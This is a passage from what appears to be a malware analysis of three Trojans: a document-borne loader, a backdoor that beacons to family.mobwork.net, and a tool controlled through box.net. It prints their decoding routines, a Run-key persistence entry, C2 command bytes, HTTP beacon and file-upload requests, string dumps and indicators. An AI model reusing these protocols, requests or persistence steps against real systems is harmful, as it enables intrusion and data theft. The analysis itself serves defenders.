00004240   C7 C6 CB DB 79 CC C1 74  B6 73 9C 04 BA F6 74 99   ÇÆËÛyÌÁt¶sœ ºöt™
00004250   E3 DE DC C7 93 C2 C3 DF  C8 DC CC C1 8B C9 C8 C6   ãÞÜÇ“ÂÃßÈÜÌÁ‹ÉÈÆ
00004260   C9 C9 D1 84 C1 C7 81 D2  EA F0 BD F5 F5 BA DD D7   ÉÉÑ„ÁǁÒêð½õõºÝ×

 

1. The shell code will search the file’s data for the string 0×58585858 (ASCII XXXX) and then 0×59595959 (ASCII YYYY).  These two DWords serve as a marker so the malware knows where to begin decoding the malicious payload.
2. The malware will then move the value 0×4605 to EAX.
3. The shell code is XORing the byte that EBX is pointing to (the beginning of the malicious payload) with AL (0×05) from EAX.  The beginning of the malicious payload is in red in the above data.  The shell code then increments EBX, moving to the next byte of the malicious payload, and decrements EAX resulting in 0×4604.

 

In essence this series of instructions locates the offset to the malicious payload and decodes that data with a decreasing XOR key of 0xFF through 0×00, beginning with the value 0×05.

 

The information for the decoded malicious payload is listed below.

 

File Name:  payload.exe
File Size:  17920 bytes
MD5:        bd05ecc444004c0c0607d084400ce4b0
SHA1:       a6c334163bced3be98b0052b9cef32ed1dc11ba7
PE Time:    0x4E5AFF4F [Mon Aug 29 02:54:07 2011 UTC]
Sections (4):
Name      Entropy  MD5
.text     7.11     dd543c698f8286686831c605ae0121f2
.rdata    3.24     8a5a10ea28ead52da3a6e58b96d9f434
.data     7.91     b06eae05ba606788eca2067b8e950919
.rsrc     2.66     1b3bb08663552241b4692e2269edf8b2

AV: 17 /42 (40.5%) [Virus Total]

The shell code will also extract a decoy document which is located in the original file (immediately after the encoded payload) in plain text.  A screen shot of the decoy is below:

The decoy document contains Chinese text, which was most likely copied and pasted from a web site.  The information for the decoy document is listed below:

File Name:  decoy.doc
File Size:  26624 bytes
MD5:        0353a19ad58daa824310c5486dd05fa0
SHA1:       81201dc2c1c3d817fd330b7904478ba5f26e427e
Metadata:
Title:      以過程論的觀點分析六方會談 審查意見
Author:     user
Company:    Hewlett-Packard
Created:    9/25/2011 01:10 AM (GMT)
Last Saved: 9/25/2001 02:27 AM (GMT)

 

The shell code will execute the payload.  The payload (Trojan.Matryoshka) is another carrier for the end malware (Trojan.Einstein).

 

The .data section of payload.exe (Trojan.Matryoshka) contains encrypted malicious code and the RC4 key to decrypt the code, which can be seen below:

 

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00001000   00 00 00 00 00 00 00 00  00 00 00 00 70 17 40 00               p @
00001010   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00001020   00 00 00 00 5C E2 B3 1F  D8 1F 95 5C E2 8A AB 33       \â³ Ø •\⊫3
00001030   11 F2 1B A7 BC BA 3F 76  91 F8 01 27 61 65 A2 3D    ò §¼º?v‘ø 'ae¢=
00001040   57 C9 6F D8 6A 2A A2 80  5E B9 67 2F FA E1 F1 93   WÉoØj*¢€^¹g/úáñ“
00001050   87 3A 7C 4E 80 21 58 DA  ED 49 19 C1 08 3E D8 3A   ‡:|N€!XÚíI Á >Ø:
00001060   10 0D 04 80 46 A3 05 EB  1A 2A 89 CB B5 CC E3 94      €F£ ë *‰ËµÌã”
00001070   1D C2 8D E1 7E 5A 0D 1B  D3 A1 84 B4 8B C9 80 C7    á~Z  Ó¡„´‹É€Ç
00001080   17 62 4A A3 3F E7 97 31  F5 56 EC F1 77 FF 77 EC    bJ£?ç—1õVìñwÿwì
00001090   EB 18 05 3D B8 CA 20 C9  A4 57 35 53 71 C2 D0 8D   ë  =¸Ê ɤW5SqÂЍ
000010A0   C6 25 C9 EC BE EC 2D 4D  FC A6 6F A8 45 65 A8 76   Æ%Éì¾ì-Mü¦o¨Ee¨v
000010B0   BA 35 9B 0F CA 59 72 CA  BE 00 82 4E 22 8E B1 77   º5› ÊYrʾ ‚N"Ž±w
000010C0   18 4E 69 7D 29 03 7F FB  0C 0A 09 CB A4 15 6E C5    Ni}) û   ˤ nÅ
000010D0   75 27 47 4D 02 DB 4A 4E  A2 6A FA D9 EF FB D2 4E   u'GM ÛJN¢júÙïûÒN
000010E0   EF A8 2D 4E 99 FB 0A 90  7D BA 00 ED B2 03 D4 98   ï¨-N™û }º í² Ô˜
000010F0   DC 7E 16 9E E9 6B 74 80  B2 17 E3 8F 09 8D DB 9D   Ü~ žékt€² ㏠Û
00001100   B1 4B EB 51 FD 83 77 61  D1 05 40 8B EC A0 4C 49   ±KëQýƒwaÑ @‹ì LI
00001110   B1 CD 7B 23 E7 E3 45 2F  9B 51 2D 07 55 8C C6 51   ±Í{#çãE/›Q- UŒÆQ
00001120   A7 E3 36 04 6A BD 00 13  FC 52 47 44 76 20 01 AB   §ã6 j½  üRGDv  «

 

The payload will use the key 0x5C E2 B3 1F D8 1F 95 5C (highlighted in yellow above) to decrypt, using the RC4 algorithm, the next 0x2E00 bytes of data (the beggining of this data is in red).

 

The payload will then search the HKLM hive of the registry for the key Software\McAfee.  If this key is located the payload will create a new process (in suspended mode) with the command line argument of services.exe [Path to executable].  The payload will then write the decrypted data to the memory space of the newly created process and then resume the thread.

 

If the payload does not find the key Software\McAfee in the registry it will create a new process with the command line argument svchost.exe {Path to executable].  The payload will then write the decrypted data to the memory space of the newly created process and then resume the thread.

 

The payload’s only real function is to decrypt the malicious payload and then execute that code.

 

 

Trojan.Einstein

I will refer to the malicious code, which is the actual malware responsible for beaconing and other “normal” malware type activities, as Trojan.Einstein.  The information for Trojan.Einstein is listed below:

 

File Name:  Einstein.exe
File Size:  11776 bytes
MD5:        1c2dfd36ad8cad978a0859d459f10326
SHA1:       f0fd24585515d88b6a01210235179e71da88be08
PE Time:    0x4E5AFF4C [Mon Aug 29 02:54:04 2011 UTC]
Sections (3):
Name      Entropy  MD5
.text     6.09     1c4d3e44b66d88c2fbaacf4b8d1ff87f
.rdata    4.69     6d01f62aa51bf35c1537d69623c36475
.data     4.38     6ba4128f61b5adb728da17e695dc4603

AV:  21/ 43 (48.8%) [Virus Total]

Once Trojan.Einstein is running it will use SC Manager to enumerate the services in the Service_Win32 service manager database.

 

The Trojan will then use the rand call and some simple math to pseudo randomly choose one of the enumerated services from above.   The name of the pseudo randomly chosen service will then be appended to the path of the current user’s Temp directory (ex. C:\Document and Settings\[user]\Local Settings\Temp\Win32Time) and .exe will be appended to that string (…Temp\Win32Time.exe).

 

Before creating a file with the chosen name, the Trojan will attempt to delete that file.  This may be done to ensure that if a benign file (with the same name) exists in that directory that it will not interfere with the malicious file. Next Trojan.Einstein will copy the original file (payload.exe or Trojan.Matryoshka)   to that location, in this case C:\Document and Settings\[user]\Local Settings\Temp\Win32Time.exe.  So depending on what services are enumerated the trojan could be named dozens of different names.

 

The malware will then create the file ~dfds3.reg in the current user’s Temp directory.  This file name was hard coded into the binary.  This file will contain data that is created by the Trojan at runtime which is related to entrenching the Trojan.  An example of the data contained in the ~dfds3.reg is listed below:

 

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"W32Time"=" C:\Document and Settings\[user]\Local Settings\Temp\Win32Time.exe "

 

Trojan.Einstein then uses the WinExec API call to execute the string “regedit.exe /s C:\DOCUME~1\[user]\LOCALS~1\Temp\~dfds3.reg“.

 

This will entrench the original payload as the file Win32Time.exe, under the CurrentVersion\Run key for the current user.

 

Now that Trojan.Einstein has taken care of the administrative work it can begin to beacon out to the C2 node.  Trojan.Einstein starts this process by acquiring the MAC address of the infected system and formats the string in the following manner: 31-41-59-26-53-58.  Trojan.Einstein will use that string as the key to encrypt and decrypt data (sent and received from the C2 node) using the RC4 algorithm.

 

Trojan.Einstein will then use a series of calls to rand to construct a five character string combined of the letters a-z (0×61-7A), this string will be used when beaconing to the C2.

 

Next the Trojan will take the compromised machine’s MAC address (ex. 31-41-59-26-53-58) and remove the dashes leaving a alphanumeric string (ex. 314159265358).  Each hexadecimal value in that string will then be incremented by one (0×01) in the manner below:

 

The new string will be 425260376469, if you were observant you probably noticed that incrementing 0×39 by one would result in 0x3A and not 0×30.  Trojan.Einstein specifically compares each new value with 0x3A, and if it matches it will use the value 0×30 instead of 0x3A.

 If the MAC address contains letters (ex. 12-34-56-AB-CD-EF) the hexadecimal values for those letters will also be incremented by one (0×01).  In this example the end result would be (23-45-67-BC-ED-FG).

 

This sample of Trojan.Einstein is configured to beacon to family.mobwork.net (and 60.249.219.82 which at the time of this writing the IP Address that family.mobwork.net resolves to).   The Trojan will initially beacon to the above URL with the following type of GET request:

 

GET /gttfi.php?id=026200425260376469 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Connection: Keep-Alive
Cache-Control: no-cache

 

The above GET request can be deconstructed in the following manner:

• The gttfi (which is highlighted in yellow) is the pseudo random string of five characters that the Trojan created just previously.

• The 425260376469 (which is highlighted in green) is the converted MAC address that the Trojan previously obfuscated.  The Trojan appends 6 pseudo randomly chosen digits (which are in red) to the beginning of the converted MAC address in an attempt to further conceal the RC4 key that will be used by the Trojan and the C2 node, in their communications.  These six digits are not relevant and are ignored by the C2 node.

 

The Trojan expects to receive data back from this initial GET request; however it does not matter what the data is, only that it gets back a response.  The Trojan will then beacon to the C2 node a second time with the same type of request as above.

Trojan.Einstein Commands

When the Trojan receives data from the C2 node it will decrypt that data with the shared RC4 key (in this case 31-41-59-26-53-58).  Once the received data is decrypted the Trojan will compare the first byte of data to the following values.  These values act as commands and following each command is a brief description of that the command will accomplish:

 

0x02 – sleep command
0x03 – Used to run commands on the system (ex. cmd.exe /c dir)
0x04 – Used to download and execute files from specified URLs or IP Addresses
0x05 – Used to download files from the current C2 node
0x07 – Used to upload a file to the C2 node

 

• When the Trojan receives the 0×02 command it will take the DWord (4 bytes) immediately preceeding the 0×02 command and use this as a sleep time.  An example can seen seen below:

 

Decrypted data – 0×0287654321

 

The value 87654321 will be used as an argument when calling sleep.  The DWord is passed to the call (little endian 21 43 65 87) which when converted to decimal is 558,065,031.  The decimal value is the number of milliseconds that the Trojan will sleep.

 

• When the Trojan receives the 0×03 command it will copy into memory the null terminated string (up to 0×104 bytes in length).  The Trojan will then create a file in the current user’s Temp folder (ex. C:\Documents and Settings\[user]\Local Settings\Temp\).  The file’s name is constructed from a series of calls to rand and some simple math.  The file’s name will be eight characters in length and will consist of the digits 0-9 (0×30- 0×39).  The output from the process is then written to that file.  An example can be seen below:

 

Decrypted data – 0×03cmd.exe /c dir

 

The string cmd.exe /c dir would be passed to the CreateProcess call as the command line parameter, as seen below.

 

00E0FBC4   00401E22  "‑@.  /CALL to CreateProcessA from Einstein.00401E1C
00E0FBC8   00000000  ....  |ModuleFileName = NULL
00E0FBCC   00E0FBFC  üûà.  |CommandLine = "cmd.exe /c dir"
00E0FBD0   00000000  ....  |pProcessSecurity = NULL
00E0FBD4   00000000  ....  |pThreadSecurity = NULL
00E0FBD8   00000001  ...  |InheritHandles = TRUE
00E0FBDC   00000000  ....  |CreationFlags = 0
00E0FBE0   00000000  ....  |pEnvironment = NULL
00E0FBE4   00000000  ....  |CurrentDir = NULL
00E0FBE8   00E0FF08  ÿà.  |pStartupInfo = 00E0FF08
00E0FBEC   00E0FF4C  Lÿà.  \pProcessInfo = 00E0FF4C

 

Because of the way that the CreateProcess call is structured if the ModuleFileName is null then the first whitespace delimitated string is used as a the module (more information get be located here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx).

 

The result is that the cmd.exe is launched as a new process and in this case the dir command is run.  The output from this command will be stored in the file that was previously created.  The Trojan will then read the contents of that file into memory and encrypt the data using the shared RC4 key.  This data will then be sent back to the C2 node in a POST request.

 

 

• When the Trojan receives the 0×04 command it will copy into memory the null terminated string (up to 0×104 bytes in length).

 

The Trojan will create a file in the user’s Temp directory.  The file’s name is constructed from a series of calls to rand and some simple math.  The file’s name will be six characters in length and will consist of the letters a-z (0×61- 0x7A).  An .exe extension will then be added to the file name.

 

Decrypted data – 0×04http://www.badstuff.com/malware.jpg

 

 

The Trojan then request’s the referenced file from the provided URL or IP Address (in this case malware.jpg).  That file will be written to the file that was created in the user’s Temp directory and then executed using WinExec.

 

• When the Trojan receives the 0×05 command it will copy into memory the null terminated string (up to 0×104 bytes in length).

 

Decrypted data – 0×05badstuff.dll

 

The Trojan will create a file in the user’s Temp directory.  That file name will be the string that follows the 0×05 command (in this case badstuff.dll).  The Trojan will then Base64 encode the file name and send the following type of GET Request:

 

GET / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Connection: Keep-Alive
Cache-Control: no-cache

 

The data that is highlighted in yellow is the Base64 encoded file name (in this case badstuff.dll).  The Trojan will then download that file from the C2 node and write the data to the newly created file in the user’s Temp folder bearing the same name.  This file will not be executed or run by the Trojan.

 

• When the Trojan receives the 0×07 command it will copy into memory the null terminated string (up to 0×104 bytes in length).

 

Decrypted data – 0×07C:\yoursecrets.rar

 

The Trojan will determine whether or not the file exists on the compromised system.  If the file exists the Trojan will take the file’s name (in this case yoursecrets.rar) and encrypt the string using the RC4 key that is being shared.  The encrypted string will then be Base64 encoded.  This string will be placed into the POST request that will upload the file to the C2 node.  In the example below the encrypted and encoded file name is highlighted in yellow.

 

 

POST / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Content-Length: 420
Connection: Keep-Alive
Cache-Control: no-cache

 

The Trojan will then encrypt the file’s data using the RC4 key being shared and transmit it to the C2 node.

 

 Strings from Trojan.Einstein

_beginthreadex
strcat
strrchr
strcpy
strlen
DeleteFileA
Sleep
WinExec
ExpandEnvironmentStringsA
MoveFileA
lstrcmpiA
GetLongPathNameA
GetTickCount
OpenSCManagerA
InternetReadFile
InternetCloseHandle
InternetOpenUrlA
InternetOpenA
family.mobwork.net
60.249.219.82
regedit.exe /s
~dfds3.reg
%tmp%\
Windows Registry Editor Version 5.00
"%s"="%s"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%tmp%
WinHttp

http://%s:%d/%s.php?id=%06d%s&ext=%s

%temp%\
/%s.php?id=%06d%s&ext=%s

http://%s:%d/%s.php?id=%06d%s

%c%c%c%c%c
/%s.php?id=%06d%s
%%temp%%\%u
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
%02X-%02X-%02X-%02X-%02X-%02X
01-01-01-01-01-01
%c%c%c%c%c%c.exe

 

• In one of our recent engagements we found an interesting Trojan that we thought was worth blogging about, not because of its capability but rather because of the way it was being controlled.  Jared and I looked at this Trojan together and named it Trojan.Boxnet.

Summary

• Trojan.Boxnet uses the file sharing site www.box.net as a medium from where it receives commands from the attacker, and where it posts the results of the commands it executes on the host.  Box.net is also used as the medium to where exfiltrated files are posted, and from where additional tools/Trojans are downloaded.  The Trojan contains the credentials of a user account created by the attacker in the binary itself.  For the purposes of this analysis we have removed the original credentials, and inserted the credentials of a temporary account at box.net, created in order to dynamically analyze this Trojan.  This Trojan allows the attacker to do the following on a compromised system:

- List logical drives
- Execute a file
- Recursive directory listing
- Download a file from box.net
- Upload a file to box.net
- List running processes
- Terminate a process
- List Services
- Change the sleep time

• The credentials we created for this analysis are:
• Username: general-Tso@binkmail.com
• Password: iLuvData

Trojan.Boxnet Analysis

•  The characteristics of this Trojan (with its credentials removed) follow:

File Name:  BOX.exe
File Size:  26112 bytes
MD5:        36ebd337752cf1289178c37ad6884ae1
SHA1:       c098be5db3d00694d9ae7de068050f6e68bdf321
PE Time:    0x4CBCFE04 [Tue Oct 19 02:10:12 2010 UTC]
AV Hits:    6/42 (13.6%) [VirusTotal]
Sections (3):
  Name      Entropy  MD5
  .text     6.32     039c7c3d682f25bb739358e69534c870
  .rdata    4.58     fad0a8972f8674d7e912cb7076ba1738
  .data     4.72     e36ee6cbfb9403a0fe88d4c1ac00ef59

• When executed, this Trojan starts by creating a mutex named letusgoboxmm1.0  to ensure that only one instance of it is running on the system.
• As you may recall, if you have read some of our other posts, we analyzed another Trojan recently that creates a similar mutex named letusgohtppmmv2.0.0.1 (Trojan.Letsgo).  So, even though the communication protocols of Trojan.Letsgo and Trojan.Boxnet are completely different, they appear to be related.
• The Trojan then authenticates with box.net and uploads a file named: RE-victim-192.168.1.9.txt to box.net.  This file contains the following data:

report myself every 18000000
cur time:2011/09/18 01:28:04 Eastern Daylight Time
proxy:PROXY_TYPE_DIRECT

• So, the filename contains the system name: victim, and its internal IP address: 192.168.1.9.  The content of the posted file reports the Trojan’s sleep time in milliseconds (i.e. 5 hours in this case), as well as the systems current time along with time zone information, and its proxy settings.  The victim then sleeps for 5 hours.
• The Trojan then looks for a file that starts with “st-” to download from box.net.  The “st-” files are the means through which the attacker issues commands to the victim.  The structure of the “st-” file names is as follows:
• st-COMMAND-ARGUMENTS.txt.
• Where COMMAND is an upper case character.
• ARGUMENTS can be an argument to certain commands.
• The content of these “st-” filenames is also important for certain commands, while for certain commands no content is expected.
• If a command-filename file contains data, it is immediately deleted once the file has been downloaded.
• I think the first file with this name that the Trojan will find in the box.net account is one that will change the sleep time, since the call to sleep is made every time the Trojan is done posting data to box.net.  So, in order to interact with the Trojan, the attacker would need to change the default sleep time of 5 hours to perhaps a few seconds.  In fact, the minimum time that can be specified must be greater than 10 seconds:

00402382      .  83C4 04                 ADD ESP, 4
00402385      .  3D 10270000             CMP EAX, 2710
0040238A      .  0F8E 9E000000           JLE Box.0040242E

• In order to change the sleep time, the attacker would place a file on box.net that may have the following name: st-W-10001.txt
• The W command instructs the Trojan to change the default sleep time (think of W as wait perhaps).
• The second dash is required, and what follows it up to the extension of the filename is converted to an integer using the “atoi” call.  In this case we have specified 10001 milliseconds (i.e. 10.1 seconds).
• So, this command will make the Trojan look for additional “st-” files more frequently and thus interact with the attacker.
• Here is a list of the other commands that this Trojan understands:

 Filename:           COMMAND                 TROJAN ACTION
 st-D-.txt          Logical partitions      Uploads RE-victim-192.168.1.9-D.txt
 st-E-.txt          Execute a file          Uploads RE-victim-10001-E.txt
 st-F-#.txt         Recursive dir listing   Uploads RE-victim-192.168.1.9-F.txt
 st-G-file.exe.txt  Download a file         Uploads RE-victim-10001-G.txt
 st-P-.txt          Process list            Uploads RE-victim-192.168.1.9-P.txt
 st-S-.txt          Service list            Uploads RE-victim-192.168.1.9-S.txt
 st-T-.txt          Terminate process       Nothing is posted.
 st-U-.txt          Upload file             Uploads RE-victim-192.168.1.9-test.txt

• Some additional notes on these commands:
• Command E: if the execution fails, the Trojan uploads RE-victim-10001-Z.txt
• Command F: the # specifies the recursive depth to follow.
• Command G: the downloaded file is saved under: C:\Documents and Settings\username\file.exe
• Command T: the process to be terminated is specified by its name.
• Command U: the file to be uploaded is specified in the content of file st-U-.txt

• Here is a string dump from this Trojan:

Text strings referenced in Box:.text
Address    Disassembly                               Text string
00401092   PUSH Box.00407118                         ASCII "%d:%s %d    "
004011CD   PUSH Box.00407124                         ASCII 0A,"     Execu"
004013AB   PUSH Box.00407148                         ASCII "USERPROFILE"
004013B9   PUSH Box.00407140                         ASCII "windir"
004014BE   PUSH Box.00407154                         ASCII "Display Name      : %s
Service Name      : %s
Process Id      : %04x (%d) "
004015BB   PUSH Box.004071B4                         ASCII "%s\"
004015C2   MOV EDI, Box.004071AC                     ASCII "\*.*"
00401696   PUSH Box.004071A4                         ASCII "%s\%s"
004016C9   PUSH Box.0040719C                         ASCII "%s\%s"
00401790   PUSH Box.004071E0                         ASCII "%s"
004017DD   MOV EDI, Box.004071D8                     ASCII "     CDROM"
004017E4   MOV EDI, Box.004071C8                     ASCII "     Remove Disk"
004017EB   MOV EDI, Box.004071BC                     ASCII "     Hard Disk"
004018CE   PUSH Box.00407248                         ASCII "InternetQueryOption failed! (%d)"
004018E1   PUSH Box.00407244                         ASCII "%"
00401902   PUSH Box.00407224                         ASCII "PROXY_TYPE_AUTO_PROXY_URL:%s"
00401921   PUSH Box.0040720C                         ASCII "PROXY_TYPE_AUTO_DETECT"
0040193C   PUSH Box.004071F8                         ASCII "PROXY_TYPE_PROXY:%s"
00401958   PUSH Box.004071E4                         ASCII "PROXY_TYPE_DIRECT"
00401A86   PUSH Box.004072C8                         ASCII "letusgoboxmm1.0"
00401AB0   MOV EDI, Box.004072C4                     ASCII "st-"
00401ABA   PUSH Box.00407BD4                         ASCII "C:\Documents and Settings\username"
00401AC5   PUSH Box.00407AD0                         ASCII "C:\WINDOWS"
00401ACE   MOV EDI, Box.00407ABC                     ASCII "st-"
00401AD3   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401ADF   PUSH Box.00407CD8                         ASCII "victim"
00401AEE   PUSH Box.004079B8                         ASCII "PROXY_TYPE_DIRECT"
00401B60   PUSH Box.0040729E                         ASCII "iLuvData"
00401B65   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401C6F   PUSH Box.004073D8                         ASCII "%Y/%m/%d %X %z"
00401CAD   XOR EAX, EAX                              (Initial CPU selection)
00401CCF   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401CD8   PUSH Box.00407CD8                         ASCII "victim"
00401CE4   PUSH Box.004073C8                         ASCII "RE-%s-%s-P.txt"
00401CF3   PUSH Box.0040729E                         ASCII "iLuvData"
00401CF8   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401D46   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401D50   PUSH Box.00407CD8                         ASCII "victim"
00401D5D   PUSH Box.004073B8                         ASCII "RE-%s-%s-D.txt"
00401D6A   PUSH Box.0040729E                         ASCII "iLuvData"
00401D6F   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401E17   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401E20   PUSH Box.00407CD8                         ASCII "victim"
00401E2C   PUSH Box.004073A8                         ASCII "RE-%s-%s-F.txt"
00401E3B   PUSH Box.0040729E                         ASCII "iLuvData"
00401E40   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401E6C   MOV EDI, Box.00407398                     ASCII "list file error"
00401EA6   PUSH Box.00407CD8                         ASCII "victim"
00401EB1   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00401EBE   PUSH Box.0040729E                         ASCII "iLuvData"
00401EC3   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401EEF   PUSH Box.00407384                         ASCII "rb"
00401F26   PUSH Box.0040737C                         ASCII "open"
00401F4A   PUSH Box.00407CD8                         ASCII "victim"
00401F55   PUSH Box.0040736C                         ASCII "RE-%s-%d-E.txt"
00401F62   PUSH Box.0040729E                         ASCII "iLuvData"
00401F67   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401F99   MOV EDI, Box.0040735C                     ASCII "execute error"
00401FE3   PUSH Box.00407CD8                         ASCII "victim"
00401FE8   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00402011   PUSH Box.00407BD4                         ASCII "C:\Documents and Settings\username"
0040201C   PUSH Box.004071A4                         ASCII "%s\%s"
00402031   PUSH Box.00407358                         ASCII "wb+"
0040209C   PUSH Box.00407CD8                         ASCII "victim"
004020A7   PUSH Box.00407348                         ASCII "RE-%s-%d-G.txt"
004020C1   MOV EDI, Box.00407334                     ASCII "get save file error"
0040210B   PUSH Box.00407CD8                         ASCII "victim"
00402110   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00402119   PUSH Box.0040729E                         ASCII "iLuvData"
0040211E   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004021B2   PUSH Box.00407384                         ASCII "rb"
0040222C   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00402231   PUSH Box.00407CD8                         ASCII "victim"
0040223C   PUSH Box.00407328                         ASCII "UP-%s-%s-%s"
00402255   PUSH Box.0040729E                         ASCII "iLuvData"
0040225A   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004022B0   PUSH Box.00407D3C                         ASCII "10.125.2.150"
004022B9   PUSH Box.00407CD8                         ASCII "victim"
004022C5   PUSH Box.00407318                         ASCII "RE-%s-%s-S.txt"
004022D4   PUSH Box.0040729E                         ASCII "iLuvData"
004022D9   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004023B9   PUSH Box.004079B8                         ASCII "PROXY_TYPE_DIRECT"
004023C0   PUSH Box.004072E8                         ASCII "report myself every %dcur time:%sproxy:%s"
004023D6   PUSH Box.00407D3C                         ASCII "10.125.2.150"
004023E0   PUSH Box.00407CD8                         ASCII "victim"
004023ED   PUSH Box.004072D8                         ASCII "RE-%s-%s.txt"
004023F6   PUSH Box.0040729E                         ASCII "iLuvData"
004023FB   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00402522   MOV EDI, Box.00407414                     ASCII "http://www.box.net/index.php?rm=box_delete_items"
00402547   MOV EDI, Box.004073FC                     ASCII "q[item_typed_ids][0]=f_"
0040259B   MOV EDI, Box.004073EC                     ASCII "&request_token="
00402A19   MOV EDI, Box.00407520                     ASCII "https://www.box.net/login"
00402A77   MOV EDI, Box.0040750C                     ASCII "http://www.box.net"
00402A8E   PUSH Box.0040750C                         ASCII "http://www.box.net"
00402B34   PUSH Box.004074F8                         ASCII "request_token = '"
00402B53   MOV EDI, Box.004074F8                     ASCII "request_token = '"
00402BA2   MOV EDI, Box.00407520                     ASCII "https://www.box.net/login"
00402BD4   MOV EDI, Box.004074EC                     ASCII "login="
00402C2B   MOV EDI, Box.004074E0                     ASCII "&password="
00402C90   MOV EDI, Box.00407448                     ASCII "&remember_login=on&__login=1&reg_step=&submit1=1&folder=&skip_framework_login=&login_or_register_m
00402DAF   MOV EDI, Box.00407540                     ASCII "Content-Type: multipart/form-data; boundary="
00402E09   MOV EDI, Box.0040753C                     ASCII ""
00403009   MOV ESI, Box.00407734                     ASCII "----------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3"
00403024   MOV ESI, Box.00407704                     ASCII "------------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3"
00403037   MOV ESI, Box.004076D4                     ASCII "------------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3--"
00403099   MOV EDI, Box.004076A0                     ASCII "Content-Disposition: form-data; name="Filename""
004030C7   MOV EDI, Box.0040753C                     ASCII ""
00403124   MOV EDI, Box.0040753C                     ASCII ""
004031BC   MOV EDI, Box.00407664                     ASCII "Content-Disposition: form-data; name="Filedata"; filename=""
00403218   MOV EDI, Box.00407660                     ASCII """
00403247   MOV EDI, Box.00407634                     ASCII "Content-Type: application/octet-stream"
00403279   MOV EDI, Box.0040753C                     ASCII ""
0040330C   MOV EDI, Box.0040753C                     ASCII ""
0040339E   MOV EDI, Box.00407604                     ASCII "Content-Disposition: form-data; name="Upload""
004033C9   MOV EDI, Box.0040753C                     ASCII ""
004033F8   MOV EDI, Box.004075F4                     ASCII "Submit Query"
00403484   MOV EDI, Box.00407594                     ASCII "http://upload.box.net/index.php?rm=box_v2_flash_upload&folder_id=d_0&description=&PHPSESSID="
004034DE   MOV EDI, Box.00407570                     ASCII "&thumbnail_to_create=small_thumb"
00403719   MOV EDI, Box.004077C4                     ASCII "https://www.box.net//files"
00403819   MOV EDI, Box.0040750C                     ASCII "http://www.box.net"
00403830   PUSH Box.0040750C                         ASCII "http://www.box.net"
004038E3   PUSH Box.004074F8                         ASCII "request_token = '"
0040390F   MOV EDI, Box.004074F8                     ASCII "request_token = '"
00403978   PUSH Box.004077B4                         ASCII ""typed_id":"f_"
00403989   MOV EDI, Box.004077B4                     ASCII ""typed_id":"f_"
004039CB   PUSH Box.004077A4                         ASCII ""name":""
004039E0   MOV EDI, Box.004077A4                     ASCII ""name":""
00403A34   PUSH Box.00407ABC                         ASCII "st-"
00403A89   MOV EDI, Box.00407ABC                     ASCII "st-"
00403B06   MOV EDI, Box.00407760                     ASCII "http://www.box.net/index.php?rm=box_v2_download_file&file_id=f_"
00403C91   MOV EDI, Box.004077E0                     ASCII "Content-Type: application/x-www-form-urlencoded"
00404544   PUSH Box.0040781C                         ASCII "https"
00404564   PUSH Box.00407814                         ASCII "http"
004046AE   PUSH Box.00407830                         ASCII "Mozilla/4.0 (compatible; )"
004046E0   PUSH Box.00407824                         ASCII "selfset:%d"
004047B8   MOV DWORD PTR SS:[ESP+1C], Box.0040786C   ASCII "*/*"
0040481E   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404824   PUSH Box.0040785C                         ASCII "GET"
00404846   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
0040485B   PUSH Box.0040784C                         ASCII "Accept: */*"
004049B8   MOV DWORD PTR SS:[ESP+1C], Box.0040786C   ASCII "*/*"
00404A34   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404A3D   PUSH Box.00407870                         ASCII "POST"
00404A5F   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
00404A7A   PUSH Box.0040784C                         ASCII "Accept: */*"
00404C0F   MOV DWORD PTR SS:[ESP+20], Box.0040786C   ASCII "*/*"
00404C98   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404C9E   PUSH Box.00407870                         ASCII "POST"
00404CC0   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
00404CD5   PUSH Box.0040784C                         ASCII "Accept: */*"
00404DB7   PUSH Box.00407878                         ASCII "Content-Length: %d"
00404F6B   PUSH Box.00407898                         ASCII "Set-Cookie: "
00405079   PUSH Box.00407898                         ASCII "Set-Cookie: "
